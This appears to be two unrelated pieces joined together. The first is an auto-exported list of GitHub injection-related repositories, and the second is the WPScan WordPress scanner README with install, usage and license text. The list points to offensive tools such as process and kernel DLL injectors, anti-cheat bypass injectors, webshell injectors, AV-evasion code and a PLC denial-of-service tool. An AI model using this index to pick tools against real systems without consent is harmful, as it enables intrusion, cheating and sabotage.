pre-knowledge - [**117**ๆ˜Ÿ][5m] [C#] [gaprogman/owaspheaders.core](https://github.com/gaprogman/owaspheaders.core) A .NET Core middleware for injecting the Owasp recommended HTTP Headers for increased security - [**117**ๆ˜Ÿ][2m] [C++] [praetorian-code/vulcan](https://github.com/praetorian-code/vulcan) a tool to make it easy and fast to test various forms of injection - [**114**ๆ˜Ÿ][2m] [Ruby] [spiderlabs/beef_injection_framework](https://github.com/spiderlabs/beef_injection_framework) Inject beef hooks into HTTP traffic and track hooked systems from cmdline - [**113**ๆ˜Ÿ][3y] [PS] [vletoux/ntlminjector](https://github.com/vletoux/ntlminjector) In case you didn't now how to restore the user password after a password reset (get the previous hash with DCSync) - [**112**ๆ˜Ÿ][2y] [cujanovic/crlf-injection-payloads](https://github.com/cujanovic/crlf-injection-payloads) Payloads for CRLF Injection - [**111**ๆ˜Ÿ][14d] [C++] [haram/splendid_implanter](https://github.com/haram/splendid_implanter) BattlEye compatible injector, done completely from user-mode, project by secret.club - [**107**ๆ˜Ÿ][27d] [C] [yurushao/droid_injectso](https://github.com/yurushao/droid_injectso) A shared libraries injection tool. - [**106**ๆ˜Ÿ][4y] [Eagle] [zapta/linbus](https://github.com/zapta/linbus) An Arduino based LINBUS stack and signal interceptor/injector. - [**105**ๆ˜Ÿ][3y] [C++] [azuregreen/injectcollection](https://github.com/azuregreen/injectcollection) A collection of injection via vc++ in ring3 - [**104**ๆ˜Ÿ][4y] [Makefile] [dtrukr/flex_injected](https://github.com/dtrukr/flex_injected) Injecting FLEX with MobileSubstrate. Inject FLEX library into 3rd party apps. - [**104**ๆ˜Ÿ][14d] [Py] [tintinweb/electron-inject](https://github.com/tintinweb/electron-inject) Inject javascript into closed source electron applications e.g. to enable developer tools for debugging. - [**102**ๆ˜Ÿ][14d] [C++] [whid-injector/whid-31337](https://github.com/whid-injector/whid-31337) WHID Elite is a GSM-enabled Open-Source Multi-Purpose Offensive Device that allows a threat actor to remotely inject keystrokes, bypass air-gapped systems, conduct mousejacking attacks, do acoustic surveillance, RF replay attacks and much more. In practice, is THE Wet Dream of any Security Consultant out there! - [**93**ๆ˜Ÿ][16d] [Py] [pdjstone/wsuspect-proxy](https://github.com/pdjstone/wsuspect-proxy) Python tool to inject fake updates into unencrypted WSUS traffic - [**92**ๆ˜Ÿ][2y] [C] [3gstudent/inject-dll-by-process-doppelganging](https://github.com/3gstudent/inject-dll-by-process-doppelganging) Process Doppelgรคnging - [**89**ๆ˜Ÿ][1m] [C] [xpn/ssh-inject](https://github.com/xpn/ssh-inject) A ptrace POC by hooking SSH to reveal provided passwords - [**87**ๆ˜Ÿ][10d] [Py] [helpsystems/wiwo](https://github.com/helpsystems/wiwo) wiwo is a distributed 802.11 monitoring and injecting system that was designed to be simple and scalable, in which all workers (nodes) can be managed by a Python framework. - [**86**ๆ˜Ÿ][4m] [Java] [pwntester/dupekeyinjector](https://github.com/pwntester/dupekeyinjector) DupeKeyInjector - [**86**ๆ˜Ÿ][9m] [Py] [safebreach-labs/bitsinject](https://github.com/safebreach-labs/bitsinject) A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service), allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account - [**83**ๆ˜Ÿ][1m] [Go] [binject/binjection](https://github.com/binject/binjection) Injects additional machine instructions into various binary formats. - [**83**ๆ˜Ÿ][11d] [JS] [fastify/light-my-request](https://github.com/fastify/light-my-request) Fake HTTP injection library - [**83**ๆ˜Ÿ][17d] [C] [oleavr/ios-inject-custom](https://github.com/oleavr/ios-inject-custom) (iOS) ไฝฟ็”จFridaๆณจๅ…ฅ่‡ชๅฎšไน‰Payload - [**82**ๆ˜Ÿ][4m] [C++] [changeofpace/mouclassinputinjection](https://github.com/changeofpace/mouclassinputinjection) MouClassInputInjection implements a kernel interface for injecting mouse input data packets into the input data stream of HID USB mouse devices. - [**78**ๆ˜Ÿ][2y] [C] [alex9191/kernel-dll-injector](https://github.com/alex9191/kernel-dll-injector) Kernel-Mode Driver that loads a dll into every new created process that loads kernel32.dll module - [**78**ๆ˜Ÿ][3y] [C] [ernacktob/esp8266_wifi_raw](https://github.com/ernacktob/esp8266_wifi_raw) ESP8266 wifi packet injection and receiving experiment - [**75**ๆ˜Ÿ][17d] [C] [liji32/mip](https://github.com/liji32/mip) MIP โ€“ macOS Injection Platform - [**74**ๆ˜Ÿ][2y] [C++] [3gstudent/inject-dll-by-apc](https://github.com/3gstudent/inject-dll-by-apc) Asynchronous Procedure Calls - [**72**ๆ˜Ÿ][2m] [C#] [komefai/ps4remoteplayinterceptor](https://github.com/komefai/ps4remoteplayinterceptor) A small .NET library to intercept and inject controls on PS4 Remote Play for Windows - [**70**ๆ˜Ÿ][8m] [JS] [lfzark/cookie-injecting-tools](https://github.com/lfzark/cookie-injecting-tools) A chrome extension ,cookie injecting tool includeing injecting ,editing ,adding ,removeing cookies. - [**68**ๆ˜Ÿ][21d] [bastilleresearch/keyjack](https://github.com/bastilleresearch/keyjack) Device discovery tools and encrypted keystroke injection advisories for Logitech, Dell, Lenovo and AmazonBasics - [**67**ๆ˜Ÿ][2m] [C] [merlijnwajer/tracy](https://github.com/merlijnwajer/tracy) tracy - a system call tracer and injector. Find us in #tracy on irc.freenode.net - [**66**ๆ˜Ÿ][4m] [YARA] [fuzzysecurity/bluehatil-2020](https://github.com/fuzzysecurity/bluehatil-2020) BlueHatIL 2020 - Staying # and Bringing Covert Injection Tradecraft to .NET - [**64**ๆ˜Ÿ][4m] [C++] [changeofpace/mouhidinputhook](https://github.com/changeofpace/mouhidinputhook) MouHidInputHook enables users to filter, modify, and inject mouse input data packets into the input data stream of HID USB mouse devices without modifying the mouse device stacks. - [**62**ๆ˜Ÿ][8m] [C] [gdbinit/osx_boubou](https://github.com/gdbinit/osx_boubou) A PoC Mach-O infector via library injection - [**62**ๆ˜Ÿ][2m] [Py] [feexd/vbg](https://github.com/feexd/vbg) ไฝฟ็”จX11่ฝฌๅ‘็š„SSHไผš่ฏ่ฟœ็จ‹ๅœจๅฎขๆˆท็ซฏๆ‰ง่กŒๆŒ‡ไปค - [**61**ๆ˜Ÿ][11d] [JS] [tserkov/vue-plugin-load-script](https://github.com/tserkov/vue-plugin-load-script) A Vue plugin for injecting remote scripts. - [**58**ๆ˜Ÿ][12d] [Py] [adhorn/aws-chaos-scripts](https://github.com/adhorn/aws-chaos-scripts) Collection of python scripts to run failure injection on AWS infrastructure - [**57**ๆ˜Ÿ][5y] [C++] [scadacs/plcinject](https://github.com/scadacs/plcinject) - [**57**ๆ˜Ÿ][3m] [C] [jar-o/osxinj_tut](https://github.com/jar-o/osxinj_tut) OSX injection tutorial: Hello World - [**56**ๆ˜Ÿ][3y] [C++] [mq1n/dllthreadinjectiondetector](https://github.com/mq1n/dllthreadinjectiondetector) - [**56**ๆ˜Ÿ][2m] [HTML] [webcoding/js_block](https://github.com/webcoding/js_block) ็ ”็ฉถๅญฆไน ๅ„็งๆ‹ฆๆˆช๏ผšๅ็ˆฌ่™ซใ€ๆ‹ฆๆˆชadใ€้˜ฒๅนฟๅ‘Šๆณจๅ…ฅใ€ๆ–—้ป„็‰›็ญ‰ - [**53**ๆ˜Ÿ][1m] [C++] [vmcall/eye_mapper](https://github.com/vmcall/eye_mapper) BattlEye x64 usermode injector - [**52**ๆ˜Ÿ][4m] [Go] [stakater/proxyinjector](https://github.com/stakater/proxyinjector) A Kubernetes controller to inject an authentication proxy container to relevant pods - [โœฉStar] if you're using it! - [**52**ๆ˜Ÿ][29d] [C] [pwn20wndstuff/injector](https://github.com/pwn20wndstuff/injector) - [**51**ๆ˜Ÿ][4m] [C++] [anubisss/szimatszatyor](https://github.com/anubisss/szimatszatyor) World of Warcraft (WoW): SzimatSzatyor is an injector sniffer written in C++ - [**51**ๆ˜Ÿ][4y] [C++] [uitra/injectora](https://github.com/uitra/injectora) x86/x64 manual mapping injector using the JUCE library - [**51**ๆ˜Ÿ][7m] [ObjC] [kpwn/inj](https://github.com/kpwn/inj) task_for_pid injection that doesn't suck - [**50**ๆ˜Ÿ][9y] [Perl] [spiderlabs/thicknet](https://github.com/spiderlabs/thicknet) TCP session interception and injection framework - [**49**ๆ˜Ÿ][3m] [JS] [pownjs/pown-duct](https://github.com/pownjs/pown-duct) Essential tool for finding blind injection attacks. - [**48**ๆ˜Ÿ][14d] [Py] [nickstadb/patch-apk](https://github.com/nickstadb/patch-apk) Wrapper to inject an Objection/Frida gadget into an APK, with support for app bundles/split APKs. - [**47**ๆ˜Ÿ][3y] [Shell] [leanvel/iinject](https://github.com/leanvel/iinject) Tool to automate the process of embedding dynamic libraries into iOS applications from GNU/Linux - [**47**ๆ˜Ÿ][11d] [Py] [adhorn/aws-lambda-chaos-injection](https://github.com/adhorn/aws-lambda-chaos-injection) Chaos Injection library for AWS Lambda - [**46**ๆ˜Ÿ][1m] [C] [gdbinit/gimmedebugah](https://github.com/gdbinit/gimmedebugah) A small utility to inject a Info.plist into binaries. - [**46**ๆ˜Ÿ][6m] [C] [cleric-k/flyskyrxfirmwarerssimod](https://github.com/cleric-k/flyskyrxfirmwarerssimod) Patched firmwares for the various FlySky receivers to inject RSSI in IBUS channel 14 - [**44**ๆ˜Ÿ][2y] [Py] [nullbites/snakeeater](https://github.com/nullbites/snakeeater) Python implementation of the reflective SO injection technique - [**44**ๆ˜Ÿ][2m] [Py] [ledger-donjon/rainbow](https://github.com/ledger-donjon/rainbow) Makes Unicorn traces. Generic Side-Channel and Fault Injection simulator - [**43**ๆ˜Ÿ][4m] [C#] [equifox/minjector](https://github.com/equifox/minjector) Mono Framework Injector (C#) using MInject Library - [**43**ๆ˜Ÿ][4y] [C++] [sekoialab/binaryinjectionmitigation](https://github.com/sekoialab/binaryinjectionmitigation) Two tools used during our analysis of the Microsoft binary injection mitigation implemented in Edge TH2. - [**42**ๆ˜Ÿ][4m] [Arduino] [exploitagency/github-esploit](https://github.com/exploitagency/github-esploit) !!! Deprecated See ESPloitV2 !!! Original PoC(Released: Sep 11, 2016) - WiFi controlled keystroke injection Using ESP8266 and 32u4 based Arduino HID Keyboard Emulator - [**39**ๆ˜Ÿ][4m] [Py] [alttch/pptop](https://github.com/alttch/pptop) Open, extensible Python injector/profiler/analyzer - [**38**ๆ˜Ÿ][10d] [C++] [ganyao114/sandboxhookplugin](https://github.com/ganyao114/sandboxhookplugin) demo for inject & hook in sandbox - [**37**ๆ˜Ÿ][1m] [JS] [dangkyokhoang/man-in-the-middle](https://github.com/dangkyokhoang/man-in-the-middle) Modify requests, inject JavaScript and CSS into pages - [**37**ๆ˜Ÿ][2m] [JS] [jackgu1988/dsploit-scripts](https://github.com/jackgu1988/dsploit-scripts) Scripts that could be injected in MITM attacks using dSploit - [**36**ๆ˜Ÿ][2m] [C] [stealth/injectso](https://github.com/stealth/injectso) - [**35**ๆ˜Ÿ][2y] [Java] [minervalabsresearch/coffeeshot](https://github.com/minervalabsresearch/coffeeshot) CoffeeShot: Avoid Detection with Memory Injection - [**35**ๆ˜Ÿ][24d] [Ruby] [skulltech/apk-payload-injector](https://github.com/skulltech/apk-payload-injector) POC for injecting Metasploit payloads on arbitrary APKs - [**35**ๆ˜Ÿ][7m] [Py] [tidesec/tdscanner](https://github.com/tidesec/tdscanner) ่‡ชๅŠจๅŒ–ๆฃ€ๆต‹ๅฐๅทฅๅ…ท๏ผŒไธป่ฆๅฎž็Žฐไบ†ๅŸŸๅๆžšไธพใ€้“พๆŽฅ็ˆฌๅ–ใ€ๆณจๅ…ฅๆฃ€ๆต‹ใ€ไธปๆœบๆ‰ซๆใ€็›ฎๅฝ•ๆžšไธพใ€ๆ•ๆ„Ÿไฟกๆฏๆฃ€ๆต‹็ญ‰ๅŠŸ่ƒฝ~ - [**34**ๆ˜Ÿ][6y] [osiris123/cdriver_loader](https://github.com/osiris123/cdriver_loader) Kernel mode driver loader, injecting into the windows kernel, Rootkit. Driver injections. - [**34**ๆ˜Ÿ][1m] [Py] [rudsarkar/crlf-injector](https://github.com/rudsarkar/crlf-injector) A CRLF ( Carriage Return Line Feed ) Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. - [**33**ๆ˜Ÿ][19d] [JS] [ebay/userscript-proxy](https://github.com/ebay/userscript-proxy) HTTP proxy to inject scripts and stylesheets into existing sites. - [**32**ๆ˜Ÿ][2m] [C++] [netdex/twinject](https://github.com/netdex/twinject) Automated player and hooking framework for bullet hell games from the Touhou Project - [**31**ๆ˜Ÿ][23d] [C++] [amirrezanasiri/usb-keystroke-injector](https://github.com/amirrezanasiri/usb-keystroke-injector) - [**29**ๆ˜Ÿ][3y] [Assembly] [borjamerino/plcinjector](https://github.com/borjamerino/plcinjector) Modbus stager in assembly and some scripts to upload/download data to the holding register of a PLC - [**29**ๆ˜Ÿ][18d] [C] [misje/dhcpoptinj](https://github.com/misje/dhcpoptinj) DHCP option injector - [**27**ๆ˜Ÿ][4m] [Py] [fluxius/v2ginjector](https://github.com/fluxius/v2ginjector) V2GInjector - Tool to intrude a V2G PowerLine network, but also to capture and inject V2G packets - [**27**ๆ˜Ÿ][3m] [Py] [xfkxfk/pyvulhunter](https://github.com/xfkxfk/pyvulhunter) python audit tool ๅฎก่ฎก ๆณจๅ…ฅ inject - [**25**ๆ˜Ÿ][9m] [Shell] [civisanalytics/iam-role-injector](https://github.com/civisanalytics/iam-role-injector) Assumes an IAM role via awscli STS call, injecting temporary credentials into shell environment - [**25**ๆ˜Ÿ][5m] [C] [hatching/tracy](https://github.com/hatching/tracy) tracy - a system call tracer and injector. Find us in #tracy on irc.freenode.net - [**25**ๆ˜Ÿ][9m] [JS] [sbarre/proxy-local-assets](https://github.com/sbarre/proxy-local-assets) BrowserSync-based Gulpfile to inject local development assets into a remote site - [**24**ๆ˜Ÿ][2y] [retrogamer74/firmwarev5.05_mirahen_baseinjection](https://github.com/retrogamer74/firmwarev5.05_mirahen_baseinjection) Mira HEN 5.05 PS4 Fast developed firmware just for the basic injection - [**23**ๆ˜Ÿ][1y] [JS] [0xsobky/xssbuster](https://github.com/0xsobky/xssbuster) XSSB is a proactive DOM sanitizer, defending against client-side injection attacks! - [**23**ๆ˜Ÿ][1m] [C] [kismetwireless/lorcon](https://github.com/kismetwireless/lorcon) LORCON 802.11 Packet Injection Library (Mirror of Kismet repository) - [**22**ๆ˜Ÿ][4m] [C++] [arsunt/tr2main](https://github.com/arsunt/tr2main) Tomb Raider II Injector Dynamic Library - [**22**ๆ˜Ÿ][3y] [Cycript] [keith/injecturlprotocol](https://github.com/keith/injecturlprotocol) Inject a custom NSURLProtocl into a running application - [**22**ๆ˜Ÿ][2y] [Py] [swisskyrepo/whid_toolkit](https://github.com/swisskyrepo/whid_toolkit) Simple script for the WHID injector - a rubberducky wifi - [**21**ๆ˜Ÿ][4m] [Py] [bountystrike/injectus](https://github.com/bountystrike/injectus) CRLF and open redirect fuzzer - [**20**ๆ˜Ÿ][1m] [Py] [migolovanov/libinjection-fuzzer](https://github.com/migolovanov/libinjection-fuzzer) This tool was written as PoC to article - [**20**ๆ˜Ÿ][2m] [Smarty] [saltwaterc/aircrack-db](https://github.com/saltwaterc/aircrack-db) A list of wireless cards tested with the dual-card injection test and in the field - [**19**ๆ˜Ÿ][1m] [Java] [toparvion/jmint](https://github.com/toparvion/jmint) jMint is a Side Effect Injection (SEI) tool aimed at simplicity of modifications expression - [**17**ๆ˜Ÿ][2y] [Py] [mostafasoliman/cve-2017-6079-blind-command-injection-in-edgewater-edgemarc-devices-exploit](https://github.com/mostafasoliman/cve-2017-6079-blind-command-injection-in-edgewater-edgemarc-devices-exploit) - [**17**ๆ˜Ÿ][2y] [C] [paullj1/w-swfit](https://github.com/paullj1/w-swfit) x64 Windows Software Fault Injection Tool - [**16**ๆ˜Ÿ][7y] [cccssw/jynkbeast](https://github.com/cccssw/jynkbeast) A novel rootkit under linux(test under cents 5.4) combine with preload_inject and sys_table modify - [**16**ๆ˜Ÿ][12d] [JS] [freehuntx/frida-inject](https://github.com/freehuntx/frida-inject) This module allows you to easily inject javascript using frida and frida-load. - [**15**ๆ˜Ÿ][17d] [Py] [ezelf/modbuskiller](https://github.com/ezelf/modbuskiller) [#Schneider] Dos PLC Modicon via Modbus Injection - [**14**ๆ˜Ÿ][2y] [chango77747/shellcodeinjector_msbuild](https://github.com/chango77747/shellcodeinjector_msbuild) - [**13**ๆ˜Ÿ][1y] [JS] [lukaszmakuch/snabbdom-signature](https://github.com/lukaszmakuch/snabbdom-signature) Protects your app against vnode injection. - [**13**ๆ˜Ÿ][2y] [C] [mnavaki/faros](https://github.com/mnavaki/faros) FAROS: Illuminating In-Memory Injection Attacks via Provenance-based Whole System Dynamic Information Flow Tracking - [**12**ๆ˜Ÿ][3y] [C++] [wyexe/x64injector](https://github.com/wyexe/X64Injector) - [**12**ๆ˜Ÿ][4m] [Java] [orhun/apkservinject](https://github.com/orhun/apkservinject) Tool for injecting (smali) services to APK files - [**11**ๆ˜Ÿ][7y] [Component Pascal] [dilshan/kidogo](https://github.com/dilshan/kidogo) Open Source USB Digital Signal Injector - [**11**ๆ˜Ÿ][2m] [C] [resilar/psyscall](https://github.com/resilar/psyscall) Linux syscall() injection - [**11**ๆ˜Ÿ][9m] [C] [wrenchonline/kernelapcinject](https://github.com/wrenchonline/kernelapcinject) - [**10**ๆ˜Ÿ][1y] [C#] [guitmz/msil-cecil-injection](https://github.com/guitmz/msil-cecil-injection) Injection of MSIL using Cecil - [**10**ๆ˜Ÿ][26d] [C++] [hrt/mouseinjectdetection](https://github.com/hrt/mouseinjectdetection) Simple method of checking whether or not mouse movement or buttons (<windows 10) are injected - [**10**ๆ˜Ÿ][3m] [C++] [jamesits/bgrtinjector](https://github.com/jamesits/bgrtinjector) Customize boot logo without modifying BIOS (UEFI firmware). - [**9**ๆ˜Ÿ][16d] [JS] [davuxcom/frida-scripts](https://github.com/davuxcom/frida-scripts) Inject JS and C# into Windows apps, call COM and WinRT APIs - [**8**ๆ˜Ÿ][2y] [C++] [xiaobo93/unmodule_shellcode_inject](https://github.com/xiaobo93/unmodule_shellcode_inject) ๆ— ๆจกๅ—ๆณจๅ…ฅๅทฅ็จ‹ VS2008 - [**8**ๆ˜Ÿ][7m] [JS] [omarkurt/ssjs](https://github.com/omarkurt/ssjs) SSJS Web Shell Injection Case - [**7**ๆ˜Ÿ][6m] [Shell] [enixes/injectorist](https://github.com/enixes/injectorist) A simple script to check all Wireless cards connected to your computer for Packet Injection capability - [**7**ๆ˜Ÿ][2m] [C] [idigitalflame/inyourmems](https://github.com/idigitalflame/inyourmems) Windows Antivirus Evasion and Memory Injection - [**7**ๆ˜Ÿ][2y] [CSS] [kp625544/runtime_secure](https://github.com/kp625544/runtime_secure) Injecting Security at run-time for web applications - [**7**ๆ˜Ÿ][5m] [ObjC] [troyzhao/aanticrack](https://github.com/troyzhao/aanticrack) ๆณจๅ…ฅไธŽๅๆณจๅ…ฅๅทฅๅ…ท Disabled the injection defenses tool - [**7**ๆ˜Ÿ][8m] [C] [anyfi/wperf](https://github.com/anyfi/wperf) 802.11 frame injection/reception tool for Linux mac80211 stack - [**6**ๆ˜Ÿ][8y] [C++] [yifanlu/psxperia-wrapper](https://github.com/yifanlu/psxperia-wrapper) Loads injected PSX games on Xperia Play - [**6**ๆ˜Ÿ][5y] [C] [mwwolters/dll-injection](https://github.com/mwwolters/DLL-Injection) - [**6**ๆ˜Ÿ][2y] [C] [moepinet/moepdefend](https://github.com/moepinet/moepdefend) Example monitoring/injection tool based on libmoep - [**6**ๆ˜Ÿ][3y] [JS] [juzna/packet-injector](https://github.com/juzna/packet-injector) Packet analyzer and injector, written in JavaScript - [**5**ๆ˜Ÿ][5m] [Java] [zabuzaw/mem-eater-bug](https://github.com/zabuzaw/mem-eater-bug) API that provides various methods for memory manipulation and injection using JNA. - [**5**ๆ˜Ÿ][6m] [C++] [sh0/airown](https://github.com/sh0/airown) Packet injection tool - [**4**ๆ˜Ÿ][4m] [C#] [mojtabatajik/.net-code-injector](https://github.com/mojtabatajik/.net-code-injector) Proof of concept of .Net worms - [**3**ๆ˜Ÿ][1y] [JS] [mhelwig/wp-webshell-xss](https://github.com/mhelwig/wp-webshell-xss) A simple wordpress webshell injector - [**3**ๆ˜Ÿ][7m] [C++] [sujuhu/antinject](https://github.com/sujuhu/antinject) - [**2**ๆ˜Ÿ][4y] [c++] [C4t0ps1s/injectme](https://bitbucket.org/c4t0ps1s/injectme) - [**2**ๆ˜Ÿ][6m] [Java] [conanjun/xssblindinjector](https://github.com/conanjun/xssblindinjector) burpๆ’ไปถ๏ผŒๅฎž็Žฐ่‡ชๅŠจๅŒ–xss็›ฒๆ‰“ไปฅๅŠxss log - [**2**ๆ˜Ÿ][2y] [JS] [mylesjohnson/pipe-injector](https://github.com/mylesjohnson/pipe-injector) Node.js script that can detect when "curl ... | bash" is being used and serve a different file than normal - [**2**ๆ˜Ÿ][2y] [C] [neocui/uefi-var-in-disk](https://github.com/neocui/uefi-var-in-disk) Inject the UEFI variable in the first sector of hard disk - [**2**ๆ˜Ÿ][2y] [C++] [wqqhit/dnshijack](https://github.com/wqqhit/dnshijack) A tool to poison a systems DNS cache by injecting faked DNS responses. - [**2**ๆ˜Ÿ][2y] [JS] [xymostech/aphrodite-globals](https://github.com/xymostech/aphrodite-globals) A library for injecting global-scope styles using Aphrodite. - [**2**ๆ˜Ÿ][4y] [C] [derosier/packetvector](https://github.com/derosier/packetvector) 802.11 management packet injection tool based on packetspammer - [**2**ๆ˜Ÿ][2m] [C] [trustedsec/inproc_evade_get-injectedthread](https://github.com/trustedsec/inproc_evade_get-injectedthread) PoC code from blog - [**1**ๆ˜Ÿ][2y] [C] [abapat/dnspoison](https://github.com/abapat/dnspoison) A DNS packet injection and poisoning detection utility - [**1**ๆ˜Ÿ][8y] [C++] [iagox86/old-injector](https://github.com/iagox86/old-injector) - [**1**ๆ˜Ÿ][8m] [Go] [joanbono/pixload](https://github.com/joanbono/pixload) Image Payload Creating/Injecting tools - [**1**ๆ˜Ÿ][3y] [C++] [bradleykirwan/disassociatedwifi](https://github.com/bradleykirwan/disassociatedwifi) A user space application for injecting packets into a WiFi interface in monitor mode. - [**1**ๆ˜Ÿ][8y] [C] [iitis/iitis-generator](https://github.com/iitis/iitis-generator) Software for distributed statistical evaluation of IEEE 802.11 wireless networks using Linux mac80211 packet injection facility - [**1**ๆ˜Ÿ][2y] [Py] [cardangi/xss-injector-python3-](https://github.com/cardangi/xss-injector-python3-) XSS PoC - [**1**ๆ˜Ÿ][6m] [Py] [gunnargrosch/serverless-chaos-demo](https://github.com/gunnargrosch/serverless-chaos-demo) This example demonstrates how to use Adrian Hornsby's Failure Injection Layer ( - [**0**ๆ˜Ÿ][2y] [C] [brorica/http_inject](https://github.com/brorica/http_inject) - [**0**ๆ˜Ÿ][1y] [phuctam/server-side-template-injection-in-craftcms-](https://github.com/phuctam/server-side-template-injection-in-craftcms-) - [**0**ๆ˜Ÿ][4y] [Py] [dshtanger/zabbix_insertdb_injection_analy](https://github.com/dshtanger/zabbix_insertdb_injection_analy) - [**None**ๆ˜Ÿ][JS] [sajjadium/origintracer](https://github.com/sajjadium/origintracer) OriginTracer: An In-Browser System for Identifying Extension-based Ad Injection - [**None**ๆ˜Ÿ][C] [kebugcheckex0xfffffff/kernel-dll-injector](https://github.com/kebugcheckex0xfffffff/kernel-dll-injector) Kernel-Mode Driver that loads a dll into every new created process that loads kernel32.dll module - [**None**ๆ˜Ÿ][C++] [contionmig/millin-injector](https://github.com/contionmig/millin-injector) Millin Injector offers many features which can aid in creating usermode cheats. Its meant to be light weight and allow users to view things such as loaded modules, imports and other smaller things - [**None**ๆ˜Ÿ][Java] [zabuzard/mem-eater-bug](https://github.com/zabuzard/mem-eater-bug) API that provides various methods for memory manipulation and injection using JNA. - [**None**ๆ˜Ÿ][Py] [roottusk/xforwardy](https://github.com/roottusk/xforwardy) Host Header Injection Scanner - [**None**ๆ˜Ÿ][C#] [thenameless314159/sockethook](https://github.com/thenameless314159/sockethook) Socket hook is an injector based on EasyHook which redirect the traffic to your local server. *** ## <a id="7004b87c5ab514b352dd7cc91acdd17b"></a>ๆ–‡็ซ  - 2020.05 [netsparker] [Top 5 Most Dangerous Injection Attacks](https://www.netsparker.com/blog/web-security/top-dangerous-injection-attacks/) - 2020.03 [rpis] [Injecting into 32-bit programs on macOS Mojave](https://rpis.ec/blog/mach_inject_32-writeup/) # ่ดก็Œฎ ๅ†…ๅฎนไธบ็ณป็ปŸ่‡ชๅŠจๅฏผๅ‡บ, ๆœ‰ไปปไฝ•้—ฎ้ข˜่ฏทๆissue
![alt text](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png "WPScan - WordPress Security Scanner") [![Gem Version](https://badge.fury.io/rb/wpscan.svg)](https://badge.fury.io/rb/wpscan) [![Build Status](https://travis-ci.org/wpscanteam/wpscan.svg?branch=master)](https://travis-ci.org/wpscanteam/wpscan) [![Code Climate](https://codeclimate.com/github/wpscanteam/wpscan/badges/gpa.svg)](https://codeclimate.com/github/wpscanteam/wpscan) [![Patreon Donate](https://img.shields.io/badge/patreon-donate-green.svg)](https://www.patreon.com/wpscan) # INSTALL ## Prerequisites: - Ruby >= 2.3 - Recommended: latest - Curl >= 7.21 - Recommended: latest - FYI the 7.29 has a segfault - RubyGems - Recommended: latest ### From RubyGems: ``` gem install wpscan ``` ### From sources: Prerequisites: Git ``` git clone https://github.com/wpscanteam/wpscan cd wpscan/ bundle install && rake install ``` # Docker Pull the repo with ```docker pull wpscanteam/wpscan``` # Usage ```wpscan --url blog.tld``` This will scan the blog using default options with a good compromise between speed and accuracy. For example, the plugins will be checked passively but their version with a mixed detection mode (passively + aggressively). Potential config backup files will also be checked, along with other interesting findings. If a more stealthy approach is required, then ```wpscan --stealthy --url blog.tld``` can be used. As a result, when using the ```--enumerate``` option, don't forget to set the ```--plugins-detection``` accordingly, as its default is 'passive'. For more options, open a terminal and type ```wpscan --help``` (if you built wpscan from the source, you should type the command outside of the git repo) The DB is located at ~/.wpscan/db WPScan can load all options (including the --url) from configuration files, the following locations are checked (order: first to last): * ~/.wpscan/cli_options.json * ~/.wpscan/cli_options.yml * pwd/.wpscan/cli_options.json * pwd/.wpscan/cli_options.yml If those files exist, options from them will be loaded and overridden if found twice. e.g: ~/.wpscan/cli_options.yml: ``` proxy: 'http://127.0.0.1:8080' verbose: true ``` pwd/.wpscan/cli_options.yml: ``` proxy: 'socks5://127.0.0.1:9090' url: 'http://target.tld' ``` Running ```wpscan``` in the current directory (pwd), is the same as ```wpscan -v --proxy socks5://127.0.0.1:9090 --url http://target.tld``` # PROJECT HOME [https://wpscan.org](https://wpscan.org) # VULNERABILITY DATABASE [https://wpvulndb.com](https://wpvulndb.com) # LICENSE ## WPScan Public Source License The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2018 WPScan Team. Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below. ### 1. Definitions 1.1 "License" means this document. 1.2 "Contributor" means each individual or legal entity that creates, contributes to the creation of, or owns WPScan. 1.3 "WPScan Team" means WPScanโ€™s core developers, an updated list of whom can be found within the CREDITS file. ### 2. Commercialization A commercial use is one intended for commercial advantage or monetary compensation. Example cases of commercialization are: - Using WPScan to provide commercial managed/Software-as-a-Service services. - Distributing WPScan as a commercial product or as part of one. - Using WPScan as a value added service/product. Example cases which do not require a commercial license, and thus fall under the terms set out below, include (but are not limited to): - Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit. - Penetration Testing Linux Distributions including but not limited to Kali Linux, SamuraiWTF, BackBox Linux. - Using WPScan to test your own systems. - Any non-commercial use of WPScan. If you need to purchase a commercial license or are unsure whether you need to purchase a commercial license contact us - [email protected]. We may grant commercial licenses at no monetary cost at our own discretion if the commercial usage is deemed by the WPScan Team to significantly benefit WPScan. Free-use Terms and Conditions; ### 3. Redistribution Redistribution is permitted under the following conditions: - Unmodified License is provided with WPScan. - Unmodified Copyright notices are provided with WPScan. - Does not conflict with the commercialization clause. ### 4. Copying Copying is permitted so long as it does not conflict with the Redistribution clause. ### 5. Modification Modification is permitted so long as it does not conflict with the Redistribution clause. ### 6. Contributions Any Contributions assume the Contributor grants the WPScan Team the unlimited, non-exclusive right to reuse, modify and relicense the Contributor's content. ### 7. Support WPScan is provided under an AS-IS basis and without any support, updates or maintenance. Support, updates and maintenance may be given according to the sole discretion of the WPScan Team. ### 8. Disclaimer of Warranty WPScan is provided under this License on an โ€œas isโ€ basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the WPScan is free of defects, merchantable, fit for a particular purpose or non-infringing. ### 9. Limitation of Liability To the extent permitted under Law, WPScan is provided under an AS-IS basis. The WPScan Team shall never, and without any limit, be liable for any damage, cost, expense or any other payment incurred as a result of WPScan's actions, failure, bugs and/or any other interaction between WPScan and end-equipment, computers, other software or any 3rd party, end-equipment, computer or services. ### 10. Disclaimer Running WPScan against websites without prior mutual consent may be illegal in your country. The WPScan Team accept no liability and are not responsible for any misuse or damage caused by WPScan. ### 11. Trademark The "wpscan" term is a registered trademark. This License does not grant the use of the "wpscan" trademark or the use of the WPScan logo.
